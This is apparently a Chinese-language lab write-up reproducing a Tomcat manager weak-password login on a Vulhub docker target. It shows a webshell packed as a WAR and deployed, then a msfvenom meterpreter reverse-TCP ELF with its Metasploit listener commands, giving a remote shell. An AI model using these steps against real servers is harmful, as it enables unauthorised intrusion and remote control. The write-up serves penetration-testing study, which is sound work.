声明:本文章仅供学习,请勿用于非法操作

环境搭建

漏洞环境是ubuntu+docker+Vulhub靶场。(以前没用过,docker竟然这么好使)
环境搭建比较简单(换源,docker,git,build,up),没有必要写了。

漏洞详情

弱口令 && 后台getshell漏洞
Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。

复现过程

弱口令

http://ip:8080/manager/html 弱口令:tomcat/tomcat

getshell

登陆后发现上传点
在这里插入图片描述
这里限制是war包,制作war包一种方法是使用命令将webshell打包为war包,另一种方法是先压缩为 .zip文件再把后缀名改为.war

jar -cvf shell.war shell.jsp

上传成功后上方显示OK,会出现如下图中黑色框中的目录在这里插入图片描述
进入目录,在url后加上原来webshell的文件名使其运行http://ip:8080/shell/shell.jsp

我这里使用的是AntSwordWebShell,使用AntSword连接成功
![在这里插入图片描述](https://img-blog.csdnimg.cn/c4bfd64db7ec4b2db0999daddb3e9cd9.png

后门

msf生成后门

使用msfconsole生成一个后门

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.66.128 lport=4444 -f elf > shell.elf

在这里插入图片描述

配置监听

使用与生成后门一样的payload

use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.66.128
set lport 4444
run

在这里插入图片描述
Antsword上传执行
在这里插入图片描述

chmod +x shell.elf
./shell.elf

在这里插入图片描述

获得shell

此时msf会进入进入meterpreter shell
在这里插入图片描述
暂时做到这一步,往后的还需要学习。

Logo

权威|前沿|技术|干货|国内首个API全生命周期开发者社区

更多推荐